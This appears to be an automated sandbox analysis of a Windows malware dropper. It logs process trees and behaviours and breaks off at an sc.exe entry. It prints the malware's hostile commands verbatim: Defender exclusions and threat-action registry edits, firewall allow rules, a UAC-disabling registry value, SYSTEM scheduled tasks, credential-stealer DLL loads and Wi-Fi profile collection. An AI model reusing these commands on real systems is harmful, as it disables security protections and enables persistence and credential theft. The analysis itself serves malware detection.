PID 908 wrote to memory of 3044	908	swiiiii.exe	35
PID 908 wrote to memory of 3044	908	swiiiii.exe	35
PID 908 wrote to memory of 3044	908	swiiiii.exe	35
PID 908 wrote to memory of 3044	908	swiiiii.exe	35
PID 908 wrote to memory of 3044	908	swiiiii.exe	35
PID 908 wrote to memory of 3044	908	swiiiii.exe	35
PID 908 wrote to memory of 3044	908	swiiiii.exe	35
PID 908 wrote to memory of 3044	908	swiiiii.exe	35
PID 908 wrote to memory of 3044	908	swiiiii.exe	35
PID 908 wrote to memory of 3044	908	swiiiii.exe	35
PID 908 wrote to memory of 3044	908	swiiiii.exe	35
PID 908 wrote to memory of 3044	908	swiiiii.exe	35
PID 908 wrote to memory of 3044	908	swiiiii.exe	35
PID 3044 wrote to memory of 1936	3044	RegAsm.exe	36
PID 3044 wrote to memory of 1936	3044	RegAsm.exe	36
PID 3044 wrote to memory of 1936	3044	RegAsm.exe	36
PID 3044 wrote to memory of 1936	3044	RegAsm.exe	36
PID 908 wrote to memory of 2360	908	swiiiii.exe	37
PID 908 wrote to memory of 2360	908	swiiiii.exe	37
PID 908 wrote to memory of 2360	908	swiiiii.exe	37
PID 908 wrote to memory of 2360	908	swiiiii.exe	37
PID 1464 wrote to memory of 2260	1464	explorha.exe	38
PID 1464 wrote to memory of 2260	1464	explorha.exe	38
PID 1464 wrote to memory of 2260	1464	explorha.exe	38
PID 1464 wrote to memory of 2260	1464	explorha.exe	38
PID 1464 wrote to memory of 2540	1464	explorha.exe	41
PID 1464 wrote to memory of 2540	1464	explorha.exe	41
PID 1464 wrote to memory of 2540	1464	explorha.exe	41
PID 1464 wrote to memory of 2540	1464	explorha.exe	41
PID 2540 wrote to memory of 2584	2540	swiiii.exe	43
PID 2540 wrote to memory of 2584	2540	swiiii.exe	43
PID 2540 wrote to memory of 2584	2540	swiiii.exe	43

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

C:\Users\Admin\AppData\Local\Temp\b6be8ac990a242fb267ad389be0e9f80_NEAS.exe
"C:\Users\Admin\AppData\Local\Temp\b6be8ac990a242fb267ad389be0e9f80_NEAS.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2728
- C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
  "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:2456
- - C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2212
  - - C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1464
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:908
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3044
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 256
        7⤵
        Program crash
        
        PID:1936
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 556
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:2360
    - - C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2260
    - - C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2540
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:2584
    - - C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
        5⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        System policy modification
        
        PID:2304
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2152
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        6⤵
        Drops startup file
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1112
        
        C:\Users\Admin\Pictures\jqPn5t9LvZatm4hVNwHWDvPr.exe
        
        "C:\Users\Admin\Pictures\jqPn5t9LvZatm4hVNwHWDvPr.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1476
        
        C:\Users\Admin\AppData\Local\Temp\u150.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u150.0.exe"
        8⤵
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\u150.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u150.1.exe"
        8⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:3644
        
        C:\Users\Admin\Pictures\XmVVwEtTyZOq3ELWjxF2eWhb.exe
        
        "C:\Users\Admin\Pictures\XmVVwEtTyZOq3ELWjxF2eWhb.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2028
        
        C:\Users\Admin\Pictures\XmVVwEtTyZOq3ELWjxF2eWhb.exe
        
        "C:\Users\Admin\Pictures\XmVVwEtTyZOq3ELWjxF2eWhb.exe"
        8⤵
        Executes dropped EXE
        
        PID:3936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:3280
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:1496
        
        C:\Users\Admin\Pictures\hlurZ0PM1Vh26mj8EbbMSmWB.exe
        
        "C:\Users\Admin\Pictures\hlurZ0PM1Vh26mj8EbbMSmWB.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2232
        
        C:\Users\Admin\Pictures\hlurZ0PM1Vh26mj8EbbMSmWB.exe
        
        "C:\Users\Admin\Pictures\hlurZ0PM1Vh26mj8EbbMSmWB.exe"
        8⤵
        Executes dropped EXE
        
        PID:4060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:996
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:2168
        
        C:\Users\Admin\Pictures\wsCTI7FobPiFWgRKIatjDe9Q.exe
        
        "C:\Users\Admin\Pictures\wsCTI7FobPiFWgRKIatjDe9Q.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3048
        
        C:\Users\Admin\Pictures\wsCTI7FobPiFWgRKIatjDe9Q.exe
        
        "C:\Users\Admin\Pictures\wsCTI7FobPiFWgRKIatjDe9Q.exe"
        8⤵
        Executes dropped EXE
        
        PID:2556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:2448
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:3948
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        9⤵
        
        PID:3900
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        10⤵
        Creates scheduled task(s)
        
        PID:3396
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        10⤵
        
        PID:2212
        
        C:\Users\Admin\Pictures\iipVM7vSx35UZtAKztyz66v6.exe
        
        "C:\Users\Admin\Pictures\iipVM7vSx35UZtAKztyz66v6.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:996
        
        C:\Users\Admin\Pictures\iipVM7vSx35UZtAKztyz66v6.exe
        
        "C:\Users\Admin\Pictures\iipVM7vSx35UZtAKztyz66v6.exe"
        8⤵
        Executes dropped EXE
        
        PID:4044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:3596
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:2044
        
        C:\Users\Admin\Pictures\Ag1awgRIajeR9leyGKSjkPbj.exe
        
        "C:\Users\Admin\Pictures\Ag1awgRIajeR9leyGKSjkPbj.exe"
        7⤵
        Modifies firewall policy service
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3444
        
        C:\Users\Admin\Pictures\UAIQMLo2YuurfzVW6dGZhT6G.exe
        
        "C:\Users\Admin\Pictures\UAIQMLo2YuurfzVW6dGZhT6G.exe"
        7⤵
        
        PID:3164
        
        C:\Users\Admin\AppData\Local\Temp\7zSE7B0.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:3280
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:1440
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:608
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:3352
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:756
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:3556
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:3244
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:1892
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:3128
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:3776
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:3392
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:2044
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3504
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:2392
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:2916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3288
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:3840
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 14:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\ymBHpha.exe\" it /sEBdidzhov 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:3380
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:2868
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:3088
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:4016
        
        C:\Users\Admin\Pictures\5NwCLWgWWJNVGJrU9ahJoRAX.exe
        
        "C:\Users\Admin\Pictures\5NwCLWgWWJNVGJrU9ahJoRAX.exe"
        7⤵
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\7zS30B1.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        
        PID:3148
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:3280
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:2728
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:2508
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:828
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:3564
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:2596
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:3700
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:2232
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:2840
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:2508
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:3804
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:1744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3484
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:928
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:2540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3856
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:2184
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 14:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\TbzIsJi.exe\" it /VHKdidRqpC 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:3556
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:2036
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:2676
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:1708
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2304 -s 856
        6⤵
        Loads dropped DLL
        
        PID:1568
    - - C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
        5⤵
        Executes dropped EXE
        
        PID:1456
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:3376
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        6⤵
        Loads dropped DLL
        
        PID:2508
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:2092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\298544033322_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4024
    - - C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
        5⤵
        Executes dropped EXE
        
        PID:3416
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 116
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:3788
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
        5⤵
        
        PID:1328
    - - C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
        5⤵
        
        PID:3500
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
        6⤵
        
        PID:3492
        
        C:\Windows\SysWOW64\sc.exe
        
